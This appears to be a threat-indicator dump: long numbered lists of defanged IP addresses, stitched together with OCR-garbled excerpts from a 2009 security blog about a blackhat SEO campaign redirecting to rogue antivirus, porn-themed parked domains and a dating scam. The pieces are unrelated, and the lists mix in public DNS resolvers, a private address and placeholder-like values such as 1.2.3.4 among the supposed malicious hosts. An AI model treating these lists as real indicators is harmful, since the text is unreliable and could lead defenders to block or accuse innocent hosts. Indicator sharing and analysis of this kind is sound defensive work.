hxxp://125.164.24.116 
hxxp://125.164.152.29 
hxxp://177.76.218.32 
hxxp://46.249.32.111 
hxxp://173.232.146.224 
hxxp://88.119.175.58 
hxxp://194.36.188.92 
hxxp://185.172.129.178 
hxxp://81.177.141.219 
hxxp://186.216.125.178 
hxxp://45.235.6.161 
hxxp://189.126.77.143 
hxxp://189.126.77.158 
hxxp://191.37.212.123 
hxxp://179.211.238.56 
hxxp://185.14.31.137 
hxxp://162.244.81.57 


22193 


hxxp://88.119.174.211 
hxxp://89.32.41.184 
hxxp://192.99.255.32 
hxxp://185.99.2.221 
hxxp://134.119.191.38 
hxxp://173.232.146.236 
hxxp://64.56.74.56 
hxxp://46.249.62.234 
hxxp://212.129.41.246 
hxxp://173.232.146.12 
hxxp://185.82.126.178 
hxxp://192.3.247.112 
hxxp://185.198.57.88 
hxxp://185.82.126.126 
hxxp://158.69.133.78 
hxxp://213.252.247.162 
hxxp://148.251.99.95 
hxxp://185.14.31.44 
hxxp://185.99.2.238 
hxxp://134.119.191.43 
hxxp://194.156.98.38 
hxxp://82.146.36.156 
hxxp://79.141.167.25 
hxxp://162.244.81.87 
hxxp://5.1.81.68 
hxxp://185.164.32.148 
hxxp://34.222.222.126 
hxxp://23.95.97.59 
hxxp://179.43.147.243 
hxxp://88.119.175.76 
hxxp://185.158.248.251 
hxxp://185.25.51.139 
hxxp://185.82.126.142 
hxxp://185.189.149.148 
hxxp://162.223.91.111 
22194 


hxxp://162.223.91.5 
hxxp://144.91.79.6 
hxxp://82.148.16.92 
hxxp://51.89.125.28 
hxxp://173.232.146.91 
hxxp://195.123.238.28 
hxxp://177.92.89.225 
hxxp://45.231.243.254 
hxxp://45.175.125.157 
hxxp://138.36.199.158 
hxxp://187.85.6.15 
hxxp://191.254.117.196 
hxxp://191.37.213.118 
hxxp://45.235.149.112 
hxxp://148.72.149.119 
hxxp://195.123.241.44 
hxxp://93.189.41.213 
hxxp://185.68.93.72 
hxxp://117.196.234.254 
hxxp://117.222.62.251 
hxxp://45.251.43.152 
hxxp://117.212.195.197 
hxxp://134.119.191.22 
hxxp://194.87.145.86 
hxxp://8.8.8.8 
hxxp://217.12.218.199 
hxxp://91.235.129.41 
hxxp://185.25.48.85 
hxxp://156.96.156.31 
hxxp://89.191.234.53 
hxxp://176.119.159.213 
hxxp://5.188.133.193 
hxxp://189.126.76.249 
hxxp://179.127.85.8 
hxxp://177.19.41.192 


22195 


hxxp://177.96.87.31 
hxxp://177.76.222.137 
hxxp://177.134.244.53 
hxxp://51.77.112.254 
hxxp://185.99.2.191 
hxxp://185.25.48.19 
hxxp://98.195.11.49 
hxxp://24.196.61.74 
hxxp://71.174.248.248 
hxxp://89.238.224.226 
hxxp://146.112.43.85 
hxxp://65.186.2.65 
hxxp://188.213.139.117 
hxxp://192.214.98.81 
hxxp://157.185.84.186 
hxxp://198.233.175.66 
hxxp://12.31.238.42 
hxxp://217.12.218.196 
hxxp://72.12.194.92 
hxxp://42.246.46.32 
hxxp://38.132.113.62 
hxxp://38.132.96.56 
hxxp://38.132.96.61 
hxxp://84.17.52.77 
hxxp://162.244.32.145 
hxxp://62.113.114.91 
hxxp://45.67.231.167 
hxxp://117.222.62.141 
hxxp://117.212.195.24 
hxxp://177.46.194.154 
hxxp://187.65.49.148 
hxxp://187.65.49.157 
hxxp://46.28.69.11 
hxxp://158.69.133.74 
hxxp://45.11.183.78 
22196 


hxxp://88.119.174.228 
hxxp://194.36.191.13 
hxxp://51.89.241.81 
hxxp://185.82.126.49 
hxxp://198.46.198.111 
hxxp://51.81.112.137 
hxxp://185.141.63.159 
hxxp://51.81.112.144 
hxxp://156.96.46.27 
hxxp://185.189.151.142 
hxxp://199.217.119.222 
hxxp://148.251.27.244 
hxxp://51.89.125.117 
hxxp://51.89.125.122 
hxxp://194.5.249.13 
hxxp://98.221.5.74 
hxxp://185.14.31.135 
hxxp://162.244.81.159 
hxxp://172.18.9.22 
hxxp://192.99.211.47 
hxxp://173.232.146.93 
hxxp://198.46.198.129 
hxxp://185.244.151.133 
hxxp://173.232.146.29 
hxxp://194.36.191.164 
hxxp://185.99.2.49 
hxxp://216.244.85.15 
hxxp://23.148.144.242 
hxxp://156.96.59.27 
hxxp://194.31.141.134 
hxxp://156.96.118.48 
hxxp://156.96.59.26 
hxxp://185.181.229.146 
hxxp://156.96.113.99 
hxxp://12.91.243.78 


22197 


hxxp://137.26.64.78 
hxxp://66.222.113.245 
hxxp://67.221.143.83 
hxxp://69.243.37.254 
hxxp://71.49.134.187 
hxxp://98.152.199.222 
hxxp://174.244.192.244 
hxxp://172.58.7.33 
hxxp://96.77.226.65 
hxxp://174.198.16.113 
hxxp://216.59.112.226 
hxxp://66.189.183.14 
hxxp://68.74.132.63 
hxxp://73.63.223.199 
hxxp://174.194.136.122 
hxxp://69.3.129.242 
hxxp://73.132.17.148 
hxxp://63.157.5.162 
hxxp://174.242.147.172 
hxxp://73.84.127.221 
hxxp://216.194.176.129 
hxxp://173.66.249.216 
hxxp://67.197.55.33 
hxxp://96.79.67.178 
hxxp://69.244.229.112 
hxxp://173.79.159.16 
hxxp://37.228.117.87 
hxxp://185.25.48.244 
hxxp://88.119.174.219 
hxxp://45.11.183.18 
hxxp://45.78.132.242 
hxxp://46.249.32.139 
hxxp://51.38.118.153 
hxxp://91.235.129.151 
hxxp://82.118.16.219 
22198 


hxxp://194.5.249.163 
hxxp://194.5.249.164 
hxxp://173.232.146.11 
hxxp://156.96.156.221 
hxxp://185.117.73.164 
hxxp://217.12.219.118 
hxxp://95.171.16.42 
hxxp://185.99.2.65 
hxxp://134.119.191.11 
hxxp://185.99.2.66 
hxxp://192.3.247.123 
hxxp://134.119.191.21 
hxxp://181.112.157.42 
hxxp://181.129.134.18 
hxxp://45.6.16.68 
hxxp://36.89.182.225 
hxxp://36.89.243.241 
hxxp://182.253.113.67 
hxxp://36.66.218.117 
hxxp://45.11.183.152 
hxxp://35.191.255.255 
hxxp://173.232.146.63 
hxxp://134.19.189.196 
hxxp://185.172.129.62 
hxxp://185.142.99.25 
hxxp://192.3.247.116 
hxxp://84.17.61.67 
hxxp://195.123.241.12 
hxxp://198.46.198.128 
hxxp://195.123.242.71 
hxxp://51.89.177.15 
hxxp://23.92.93.234 
hxxp://194.5.249.17 
hxxp://195.123.242.84 
hxxp://51.89.163.32 


22199 


hxxp://23.92.93.236 
hxxp://198.46.198.131 
hxxp://195.123.242.99 
hxxp://194.5.249.174 
hxxp://185.164.32.214 
hxxp://198.46.198.139 
hxxp://195.123.241.187 
hxxp://185.234.72.77 
hxxp://51.89.177.31 
hxxp://194.5.249.175 
hxxp://185.164.32.215 
hxxp://198.46.198.133 
hxxp://195.123.241.94 
hxxp://51.89.177.7 
hxxp://23.92.93.237 
hxxp://194.5.249.185 
hxxp://195.123.242.57 
hxxp://198.46.198.13 
hxxp://195.123.242.72 
hxxp://51.89.177.8 
hxxp://194.5.249.186 
hxxp://149.28.43.215 
hxxp://51.81.112.171 
hxxp://185.141.63.38 
hxxp://195.123.222.2 
hxxp://217.12.218.28 
hxxp://64.173.224.7 
hxxp://118.69.221.114 
hxxp://91.132.139.153 
hxxp://37.252.13.245 
hxxp://5.61.61.169 
hxxp://89.249.65.229 
hxxp://37.252.8.182 
hxxp://84.247.51.126 
hxxp://188.116.27.84 
22200 


hxxp://37.252.8.193 
hxxp://37.252.8.186 
hxxp://37.252.8.161 
hxxp://37.252.8.187 
hxxp://37.252.9.154 
hxxp://185.156.173.99 
hxxp://185.244.213.34 
hxxp://185.86.148.63 
hxxp://185.183.99.149 
hxxp://51.75.181.36 
hxxp://192.169.6.82 
hxxp://23.94.233.253 
hxxp://213.87.146.113 
hxxp://185.82.127.4 
hxxp://185.244.149.48 


hxxp://125.125.125.125 


hxxp://51.89.177.9 
hxxp://194.5.249.193 
hxxp://64.44.133.137 
hxxp://194.5.249.194 
hxxp://185.164.32.216 
hxxp://195.123.247.34 
hxxp://64.44.133.61 
hxxp://194.5.249.197 
hxxp://195.123.221.49 
hxxp://185.164.32.219 
hxxp://185.244.39.251 
hxxp://195.123.241.63 
hxxp://194.5.249.198 
hxxp://185.164.32.218 
hxxp://167.86.123.175 
hxxp://195.123.241.68 
hxxp://195.123.242.83 
hxxp://179.43.147.234 
hxxp://185.17.121.162 


22201 


hxxp://173.232.146.226 
hxxp://5.61.33.195 
hxxp://5.61.32.173 
hxxp://91.132.139.218 
hxxp://37.252.9.69 
hxxp://89.44.9.148 
hxxp://89.38.225.228 
hxxp://195.123.237.241 
hxxp://5.182.211.125 
hxxp://195.123.241.224 
hxxp://185.99.2.116 
hxxp://5.182.211.124 
hxxp://195.123.241.229 
hxxp://185.234.72.114 
hxxp://194.5.249.214 
hxxp://185.99.2.115 
hxxp://51.89.215.186 
hxxp://194.5.249.215 
hxxp://195.123.242.119 
hxxp://185.99.2.118 
hxxp://5.182.211.138 
hxxp://51.77.112.252 
hxxp://194.5.249.225 
hxxp://195.123.241.59 
hxxp://51.77.112.253 
hxxp://194.5.249.226 
hxxp://185.99.2.128 
hxxp://195.123.241.58 
hxxp://88.119.175.234 
hxxp://194.76.226.98 
hxxp://95.171.15.71 
hxxp://46.249.32.16 
hxxp://46.249.62.195 
hxxp://195.123.241.175 
hxxp://51.89.215.189 
22202 


mim14test .us 
mim13test .us 
mim1I1test .us 
mim15test .us 
mim19test .us 
f90852test .us 
f90851test .us 
f9087test .us 
f9086test .us 
f905test .us 
f908test .us 
ff7test5 .us 
g2gltest .us 


Blackhat SEO domains participating in the third campaign: 
greg-page-boxing.6may2009 .com - 212.95.58.156 
dualsaw.06may2009 .com 

craigslist-killer.smay2009 .com 


Upon clicking, the user is redirected to berusimcom .com/t.php?s=18 &pk=, then to 
the SEO keyword logger at berusimcom .com/in.cgi?18 &seoref= &parameter= $key- 
word &se= $se &ur=1 &HTTP _REFERER=nfl-draft.smay2009 .com &ppckey=, and then 
exposed to another portfolio of rogue security software ([7]detection rate) at hot-porn- 
tubes.com/promo3/?aid=1361 &vname<=antivirus - 78.129.166.166; 91.212.132.12, with the 
following domains parked at the same IPs: 


xxxtube-for-xxxtube .com 
youporn-for-free .com 
xtube-xmovie .com 
free-xxx-central .com 
xtube-downloads .com 
porn-tube-movies .com 
my-fuck-movies .com 
niche-tube-videos-here .net 
free-tube-video-central .net 
tubezzz-boobezzz .net 
hot-tube-tuberzzz .net 


Persistence must be met with persistence. 


1. http: //ddanchev. blogspot . com/2009/04/massive-blackhat-seo-campaign-serving.html 
2. http: //ddanchev.blogspot .com/2009/04/twitter-worm-mikeyy-keywords-hi jacked. htm 
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hxxp://195.123.241.124 
hxxp://194.5.249.229 
hxxp://195.123.241.92 
hxxp://185.99.2.239 
hxxp://192.3.247.11 
hxxp://192.3.247.115 
hxxp://85.143.221.85 
hxxp://82.146.37.128 
hxxp://187.35.237.51 
hxxp://189.126.78.19 
hxxp://131.255.169.48 
hxxp://191.37.213.79 
hxxp://143.255.7.233 
hxxp://177.46.197.82 
hxxp://45.186.96.249 
hxxp://95.181.155.77 
hxxp://45.138.158.41 
hxxp://194.5.249.221 
hxxp://195.123.241.134 
hxxp://51.89.177.11 
hxxp://195.123.212.211 
hxxp://134.19.189.187 
hxxp://188.68.221.214 
hxxp://193.238.153.7 
hxxp://88.119.175.123 
hxxp://185.68.93.8 
hxxp://185.66.12.218 
hxxp://195.123.237.95 
hxxp://185.43.5.79 
hxxp://185.43.6.59 
hxxp://36.72.89.95 
hxxp://125.167.144.34 
hxxp://182.253.174.93 
hxxp://124.158.172.28 
hxxp://138.97.93.125 
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hxxp://117.252.65.13 
hxxp://117.252.65.27 
hxxp://117.212.194.48 
hxxp://69.197.132.42 
hxxp://38.122.185.171 
hxxp://12.215.19.98 
hxxp://164.132.76.76 
hxxp://194.156.98.46 
hxxp://188.225.9.82 
hxxp://85.143.221.6 
hxxp://185.234.72.35 
hxxp://51.77.112.255 
hxxp://194.5.249.246 
hxxp://185.99.2.244 
hxxp://5.182.211.222 
hxxp://45.89.125.148 
hxxp://185.99.2.243 
hxxp://5.182.211.223 
hxxp://194.5.249.247 
hxxp://185.234.72.94 
hxxp://51.89.163.33 
hxxp://194.5.249.248 
hxxp://195.123.241.136 
hxxp://185.99.2.179 
hxxp://5.182.211.25 
hxxp://195.123.241.49 
hxxp://185.234.72.155 
hxxp://194.5.249.143 
hxxp://195.123.241.241 
hxxp://185.99.2.83 
hxxp://134.255.254.194 
hxxp://194.5.249.142 
hxxp://195.123.241.242 
hxxp://185.99.2.184 
hxxp://185.142.99.32 
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hxxp://164.132.255.233 
hxxp://93.189.46.41 
hxxp://81.177.139.38 
hxxp://37.252.11.147 
hxxp://5.61.36.89 
hxxp://96.36.51.115 
hxxp://89.38.225.171 
hxxp://37.252.8.144 
hxxp://37.252.5.58 
hxxp://45.89.175.135 
hxxp://8.17.112.7 
hxxp://45.153.185.81 
hxxp://194.156.98.172 
hxxp://188.227.59.174 
hxxp://195.2.93.227 
hxxp://185.66.13.126 
hxxp://54.37.237.253 
hxxp://186.192.178.57 
hxxp://117.254.56.72 
hxxp://117.252.68.226 
hxxp://177.99.21.247 
hxxp://117.196.233.231 
hxxp://45.235.151.37 
hxxp://45.179.112.52 
hxxp://45.179.112.89 
hxxp://117.252.64.225 
hxxp://117.242.37.213 
hxxp://71.173.79.26 
hxxp://195.123.241.194 
hxxp://217.12.218.29 
hxxp://173.234.155.124 
hxxp://5.9.178.75 
hxxp://45.138.158.53 
hxxp://179.43.158.187 
hxxp://185.183.98.14 
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hxxp://164.132.76.175 
hxxp://117.196.229.213 
hxxp://117.241.99.24 
hxxp://117.212.192.178 
hxxp://112.196.167.42 
hxxp://112.196.167.58 
hxxp://117.252.66.77 
hxxp://45.67.228.196 
hxxp://46.28.69.81 
hxxp://46.28.69.53 
hxxp://5.61.34.63 
hxxp://5.61.45.151 
hxxp://37.1.223.182 
hxxp://188.116.23.111 
hxxp://95.217.4.85 
hxxp://217.23.1.184 
hxxp://96.95.54.21 
hxxp://69.145.82.234 
hxxp://5.61.34.245 
hxxp://37.1.221.52 
hxxp://37.252.9.224 
hxxp://194.5.249.136 
hxxp://185.99.2.54 
hxxp://185.99.2.176 
hxxp://194.5.249.31 
hxxp://195.123.241.157 
hxxp://45.155.173.196 
hxxp://51.89.177.18 
hxxp://195.123.241.182 
hxxp://185.244.39.65 
hxxp://195.123.241.183 
hxxp://185.234.72.147 
hxxp://51.89.177.5 
hxxp://23.239.84.132 
hxxp://194.5.249.126 
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hxxp://185.99.2.161 
hxxp://51.89.177.4 
hxxp://23.239.84.136 
hxxp://51.89.177.16 
hxxp://194.5.249.171 
hxxp://185.14.31.143 
hxxp://195.123.241.13 
hxxp://134.255.235.88 
hxxp://194.5.249.156 
hxxp://195.123.241.55 
hxxp://138.91.73.189 
hxxp://37.252.4.97 
hxxp://37.252.5.157 
hxxp://37.252.5.139 
hxxp://37.252.5.156 
hxxp://37.72.168.242 
hxxp://195.123.237.91 
hxxp://91.235.129.64 
hxxp://194.87.232.53 
hxxp://185.17.123.63 
hxxp://45.138.158.35 
hxxp://185.242.85.194 
hxxp://195.123.237.153 
hxxp://185.142.99.8 
hxxp://185.68.93.33 
hxxp://82.146.54.254 
hxxp://195.123.217.27 
hxxp://45.89.127.27 
hxxp://185.99.2.196 
hxxp://195.123.241.52 
hxxp://45.89.127.38 
hxxp://195.123.241.51 
hxxp://185.164.32.161 
hxxp://164.68.116.248 
hxxp://5.34.178.247 
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hxxp://45.89.127.91 
hxxp://194.5.249.196 
hxxp://185.164.32.135 
hxxp://5.34.178.59 
hxxp://131.153.22.148 
hxxp://45.89.127.92 
hxxp://194.5.249.195 
hxxp://185.164.32.118 
hxxp://167.86.126.27 
hxxp://195.123.242.141 
hxxp://131.153.22.145 
hxxp://45.89.127.118 
hxxp://23.92.93.227 
hxxp://194.5.249.217 
hxxp://185.14.31.164 
hxxp://185.99.2.123 
hxxp://5.182.211.47 
hxxp://45.89.127.119 
hxxp://23.92.93.232 
hxxp://194.5.249.216 
hxxp://85.143.223.16 
hxxp://194.156.98.215 
hxxp://95.211.38.161 
hxxp://5.17.161.235 
hxxp://68.224.217.72 
hxxp://64.227.113.155 
hxxp://188.225.33.51 
hxxp://199.116.81.194 
hxxp://1.1.1.1 
hxxp://195.123.213.19 
hxxp://173.232.146.118 
hxxp://52.237.163.166 
hxxp://3.21.2.2 
hxxp://3.88.67.132 
hxxp://54.185.138.96 
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hxxp://3.95.231.52 
hxxp://136.243.42.38 
hxxp://78.46.78.74 
hxxp://195.91.226.161 
hxxp://11.22.33.44 
hxxp://96.9.225.147 
hxxp://96.9.225.146 
hxxp://185.217.117.127 
hxxp://54.236.253.121 
hxxp://3.135.193.147 
hxxp://95.26.211.228 
hxxp://95.211.95.232 
hxxp://13.58.213.252 
hxxp://3.81.126.82 
hxxp://54.213.49.29 
hxxp://3.235.164.215 
hxxp://3.238.77.5 
hxxp://45.89.127.182 
hxxp://194.5.249.242 
hxxp://195.123.241.146 
hxxp://195.123.241.147 
hxxp://184.164.137.173 
hxxp://45.89.127.178 
hxxp://194.5.249.241 
hxxp://195.123.241.145 
hxxp://195.123.241.149 
hxxp://184.164.137.172 
hxxp://52.34.17.37 
hxxp://18.212.74.215 
hxxp://3.128.197.68 
hxxp://3.238.75.236 
hxxp://54.83.253.135 
hxxp://18.191.38.26 
hxxp://195.123.242.37 
hxxp://54.91.36.142 
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hxxp://54.245.74.151 
hxxp://3.138.117.231 
hxxp://51.89.177.3 
hxxp://194.5.249.39 
hxxp://5.34.181.32 
hxxp://195.123.241.243 
hxxp://66.85.156.69 
hxxp://185.183.96.51 
hxxp://45.89.127.214 
hxxp://167.86.127.125 
hxxp://66.85.156.68 
hxxp://185.117.73.54 
hxxp://45.89.127.224 
hxxp://194.5.249.128 
hxxp://184.164.146.112 
hxxp://185.198.57.75 
hxxp://45.89.127.222 
hxxp://51.89.177.1 
hxxp://195.123.241.85 
hxxp://184.164.146.113 
hxxp://185.183.96.11 
hxxp://162.244.82.246 
hxxp://217.12.219.245 
hxxp://52.13.154.32 
hxxp://34.238.84.181 
hxxp://3.137.174.178 
hxxp://89.32.41.191 
hxxp://194.5.249.46 
hxxp://173.231.63.82 
hxxp://173.231.63.98 
hxxp://173.231.59.124 
hxxp://172.83.43.136 
hxxp://45.152.182.147 
hxxp://193.148.18.68 
hxxp://172.98.93.227 
22210 


hxxp://66.115.149.227 
hxxp://193.148.18.35 
hxxp://45.152.182.131 
hxxp://45.87.214.214 
hxxp://89.187.171.243 
hxxp://193.148.18.86 
hxxp://84.17.63.12 
hxxp://89.187.175.137 
hxxp://45.87.214.198 
hxxp://54.212.116.99 
hxxp://5.181.156.226 
hxxp://46.28.69.153 
hxxp://74.222.14.27 
hxxp://195.123.222.49 
hxxp://51.195.192.115 
hxxp://54.198.212.211 
hxxp://3.135.216.86 
hxxp://54.212.16.8 
hxxp://5.181.156.238 
hxxp://95.153.31.13 
hxxp://194.5.249.113 
hxxp://5.182.211.218 
hxxp://195.123.242.36 
hxxp://89.32.41.152 
hxxp://185.163.47.215 
hxxp://96.9.252.152 
hxxp://95.153.31.163 
hxxp://185.234.72.93 
hxxp://194.5.249.14 
hxxp://195.123.242.132 
hxxp://195.123.242.135 
hxxp://5.181.156.211 
hxxp://96.9.255.223 
hxxp://95.153.31.169 


hxxp://194.5.249.168 
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hxxp://66.85.183.5 
hxxp://185.163.47.157 
hxxp://3.84.251.164 
hxxp://3.82.197.66 
hxxp://3.12.41.157 
hxxp://46.17.98.193 
hxxp://3.86.163.159 
hxxp://3.91.47.199 
hxxp://3.139.97.6 
hxxp://18.236.63.179 
hxxp://52.37.88.45 
hxxp://195.123.243.19 
hxxp://34.239.246.132 
hxxp://54.196.129.197 
hxxp://1.2.3.4 
hxxp://5.6.7.8 
hxxp://51.62.71.83 
hxxp://2.3.4.5 
hxxp://21.31.41.51 
hxxp://14.25.36.47 
hxxp://41.24.53.64 
hxxp://188.138.1.53 
hxxp://12.34.45.67 
hxxp://195.1.15.68 
hxxp://147.126.54.43 
hxxp://85.25.235.173 
hxxp://6.2.2.1 
hxxp://6.2.2.2 
hxxp://6.2.2.3 
hxxp://4.3.2.1 
hxxp://55.55.55.55 
hxxp://123.45.67.89 
hxxp://85.25.217.69 
hxxp://2.2.2.2 


hxxp://15.4.4.18 
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3. http: //ddanchev. blogspot .com/2009/04/diverse-portfolio-of-fake-security_16.htm 
4. http://4.bp. blogspot .com/_wICHhTiQmrA/Se83RHR2GwI/AAAAAAAADKA/-aXt_tCa3_k/s1600-h/blackhat_seo_news_scare 


are_11.JP 


5. http: //ddanchev. blogspot .com/2009/04/massive-blackhat-seo-campaign-serving. htm 


6. http://www. virustotal .com/analisis/18e8d52529e7£0d58bd706663058d341 
7. http: //www.virustotal.com/analisis/565faeb69959c4dfal6faa449ebd8a0 


5.5.3 Spamvertised Swine Flu Domains - Part Two (2009-05-06 16:20) 


5.5.4 Dating Spam Campaign Promotes Bogus Dating Agency (2009-05-06 19:45) 


Register Now 


Svetlana B. 


Age 21 years old 


Age range of man: 25-50 y.o. 
My Languages: Russian 


66 | want to learn to live in a harmony with 
people around; to become a happy mother, 
trustworthy wife; to master some foreign 
language, maybe English; to be independent. 
| want to meet a man who is kind, reliable, 
confident, well-mannered, with a good sense 
of humor, who can take and give love, 
romantic and caring. 


- 
Send message Se 


From Sweet Sugar Anastasia, Svetlana, Angela, Marino4ka, Irina, Hot Julia, Ane4ka, Nastya, and 
Yulia, to the [1]Lonely Polina and the [2]malware and exploits serving girls, Russian/Ukrainian 
dating scams are still pretty active these days. 


A recently spammed dating campaign exposes the fraudulent practices of a well known 
such agency (Confidential Connections) that has been [3]changing its name, typosquatting 
new domains in order to remain beneath the radar, a bit of an awkward practice given their 
noisy spamming approach of attracting visitors. 
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hxxp://45.142.215.227 
hxxp://185.117.73.55 
hxxp://195.123.239.127 
hxxp://146.185.219.74 
hxxp://45.11.183.194 
hxxp://73.6.225.41 
hxxp://1.31.8.1 
hxxp://173.239.199.96 
hxxp://162.33.177.123 
hxxp://162.33.177.152 
hxxp://162.33.178.131 
hxxp://162.33.179.12 
hxxp://162.33.179.96 
hxxp://31.13.195.145 
hxxp://6.15.2.41 
hxxp://4.4.8.137 
hxxp://1.3.38.92 
hxxp://95.1.31.88 
hxxp://1.3.153.47 
hxxp://1.1.1.47 
hxxp://4.1.1.64 
hxxp://162.33.177.69 
hxxp://212.8.251.19 
hxxp://19.4.3.38 
hxxp://3.7.1.28 
hxxp://3.1.64.11 
hxxp://45.148.123.47 
hxxp://32.3.198.49 
hxxp://32.2.188.47 
hxxp://162.33.177.196 
hxxp://1.35.133.1 
hxxp://1.3.153.53 
hxxp://2.8.181.13 
hxxp://94.31.96.65 
hxxp://162.33.178.33 
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hxxp://2.8.3.96 
hxxp://5.2.5.1 
hxxp://21.6.39.7 
hxxp://142.187.198.81 
hxxp://45.15.131.126 
hxxp://64.114.197.215 
hxxp://5.7.4.39 
hxxp://66.244.231.66 
hxxp://194.147.115.132 
hxxp://164.51.5.2 
hxxp://69.58.122.58 
hxxp://142.11.237.178 
hxxp://185.99.132.121 
hxxp://5.4.1.149 
hxxp://1.2.1.24 
hxxp://5.5.1.38 
hxxp://185.163.45.95 
hxxp://185.183.96.244 
hxxp://185.99.133.67 
hxxp://31.13.195.125 
hxxp://31.13.195.87 
hxxp://5.39.63.98 
hxxp://68.33.66.155 
hxxp://162.33.177.194 
hxxp://3.1.2.4 
hxxp://1.18.15.1 
hxxp://9.1.4.44 
hxxp://5.1.8.12 
hxxp://162.33.179.52 
hxxp://1.3.38.34 
hxxp://185.158.251.49 
hxxp://45.61.136.145 
hxxp://3.1.1.35 
hxxp://1.67.12.19 


hxxp://2.1.1.1 
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hxxp://1.1.11.1 
hxxp://3.4.4.132 
hxxp://32.12.5.2 
hxxp://8.5.2.199 
hxxp://45.138.51.223 
hxxp://3.1.21.215 
hxxp://2.11.52.58 
hxxp://17.7.2.1 
hxxp://162.33.177.154 
hxxp://67.253.155.114 
hxxp://9.3.15.26 
hxxp://19.4.3.166 
hxxp://2.2.32.1 
hxxp://76.88.177.39 
hxxp://162.33.179.217 
hxxp://1.2.2.3 
hxxp://6.1.4.2 
hxxp://2.6.3.1 
hxxp://216.237.233.243 
hxxp://1.5.6.19 
hxxp://21.9.1.2 
hxxp://3.4.8.3 
hxxp://21.9.1.3 
hxxp://162.33.179.88 
hxxp://12.11.3.17 
hxxp://98.153.137.2 
hxxp://7.1.4.2 
hxxp://7.2.2.89 
hxxp://24.153.193.11 
hxxp://216.165.95.169 
hxxp://7.3.1.43 
hxxp://7.3.2.45 
hxxp://7.3.4.82 
hxxp://146.57.146.237 
hxxp://7.7.1.16 
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hxxp://141.126.226.19 
hxxp://167.232.252.15 
hxxp://4.12.5.8 
hxxp://1.3.3.41 
hxxp://65.182.237.56 
hxxp://2.9.5.3 
hxxp://3.3.2.198 
hxxp://198.231.16.16 
hxxp://7.4.5.122 
hxxp://4.17.1.19 
hxxp://149.28.98.49 
hxxp://98.41.132.238 
hxxp://68.142.59.111 
hxxp://5.4.3.151 
hxxp://24.175.94.173 
hxxp://7.2.2.2 
hxxp://4.13.3.38 
hxxp://22.4.2.242 
hxxp://1.21.1.38 
hxxp://72.168.176.36 
hxxp://86.98.26.196 
hxxp://5.181.156.16 
hxxp://1.1.8.23 
hxxp://1.1.9.33 
hxxp://1.3.153.55 
hxxp://22.15.2.22 
hxxp://162.33.178.179 
hxxp://98.242.233.183 
hxxp://98.193.38.212 
hxxp://24.177.57.124 
hxxp://184.188.122.164 
hxxp://162.33.177.158 
hxxp://162.33.178.237 
hxxp://2.5.1.15 
hxxp://4.8.1.7 
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hxxp://162.33.177.25 
hxxp://162.33.178.119 
hxxp://162.33.178.121 
hxxp://162.33.178.246 
hxxp://162.33.178.49 
hxxp://162.33.179.158 
hxxp://45.11.183.129 
hxxp://87.121.52.177 
hxxp://87.121.52.61 
hxxp://64.217.158.234 
hxxp://96.2.3.28 
hxxp://47.189.63.47 
hxxp://162.33.177.178 
hxxp://162.33.179.2 
hxxp://67.253.34.174 
hxxp://4.4.9.142 
hxxp://1.3.32.136 
hxxp://1.2.6.7 
hxxp://1.3.38.35 
hxxp://8.5.1.1 
hxxp://73.245.195.88 
hxxp://24.16.143.39 
hxxp://87.121.52.247 
hxxp://98.149.34.69 
hxxp://7.1.5.2 
hxxp://1.3.85.73 
hxxp://162.33.178.97 
hxxp://162.33.179.144 
hxxp://64.237.67.18 
hxxp://4.1.2.73 
hxxp://162.33.179.237 
hxxp://172.58.84.56 
hxxp://96.39.18.58 
hxxp://185.158.251.73 
hxxp://71.8.41.154 
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hxxp://3.8.3.29 
hxxp://3.1.1.3 
hxxp://1.3.35.45 
hxxp://7.17.13.75 
hxxp://2.8.221.11 
hxxp://51.52.28.218 
hxxp://193.169.86.84 
hxxp://4.6.11.191 
hxxp://3.5.171.27 
hxxp://2.5.171.27 
hxxp://5.6.7.43 
hxxp://1.1.2.4 
hxxp://8.8.34.31 
hxxp://12.18.34.21 
hxxp://4.1.1.14 
hxxp://6.8.9.41 
hxxp://71.95.179.165 
hxxp://6.6.26.37 
hxxp://6.6.27.39 
hxxp://3.9.1.245 
hxxp://1.4.3.1 
hxxp://5.7.21.28 
hxxp://1.3.28.15 
hxxp://3.9.14.1 
hxxp://1.8.4.1 
hxxp://1.9.7.2 
hxxp://31.13.195.129 
hxxp://21.6.4.42 
hxxp://2.8.231.11 
hxxp://11.21.2.2 
hxxp://1.67.12.24 
hxxp://9.13.18.133 
hxxp://4.2.3.1 
hxxp://27.1.36.23 
hxxp://3.9.2.1 
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hxxp://94.249.131.6 
hxxp://1.3.35.1 
hxxp://2.3.2.48 
hxxp://2.3.2.26 
hxxp://87.121.52.173 
hxxp://1.4.9.2 
hxxp://1.1.19.1 
hxxp://8.8.24.33 
hxxp://11.4.2.2 
hxxp://21.5.33.3 
hxxp://12.13.42.1 
hxxp://162.33.177.179 
hxxp://162.33.179.23 
hxxp://162.33.177.217 
hxxp://162.33.177.229 
hxxp://162.33.178.243 
hxxp://68.129.145.245 
hxxp://194.147.115.7 
hxxp://5.255.96.16 
hxxp://84.32.188.182 
hxxp://91.234.254.127 
hxxp://96.73.198.57 
hxxp://68.187.5.2 
hxxp://162.33.178.128 
hxxp://2.18.1.1 
hxxp://4.6.39.2 
hxxp://24.248.85.157 


hxxp://188.127.251.111 


hxxp://67.248.165.112 
hxxp://12.12.1.1 
hxxp://65.219.196.73 
hxxp://142.116.35.243 
hxxp://194.15.113.155 
hxxp://162.33.178.147 
hxxp://162.33.179.53 


22219 


hxxp://1.3.38.16 
hxxp://9.1.1.5 
hxxp://12.9.18.3 
hxxp://4.6.21.1 
hxxp://1.19.9.1 
hxxp://4.6.1.1 
hxxp://162.211.2.243 
hxxp://162.33.177.88 
hxxp://45.61.136.128 
hxxp://4.8.84.163 
hxxp://7.7.3.161 
hxxp://6.2.16.1 
hxxp://8.2.8.25 
hxxp://1.5.2.1 
hxxp://162.33.179.111 
hxxp://1.2.2.37 
hxxp://4.2.1.89 
hxxp://18.1.1.13 
hxxp://3.94.2.21 
hxxp://212.219.57.43 
hxxp://3.7.2.3 
hxxp://12.9.4.55 
hxxp://2.8.241.7 
hxxp://148.163.42.213 
hxxp://188.127.235.177 
hxxp://1.3.153.57 
hxxp://1.1.1.32 
hxxp://4.4.129.1 
hxxp://3.9.1.33 
hxxp://4.2.11.42 
hxxp://1.7.5.63 
hxxp://9.5.23.176 
hxxp://1.3.25.11 
hxxp://13.5.2.4 
hxxp://162.33.178.35 
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hxxp://4.6.12.241 
hxxp://173.235.92.194 
hxxp://2.2.4.44 
hxxp://3.4.8.4 
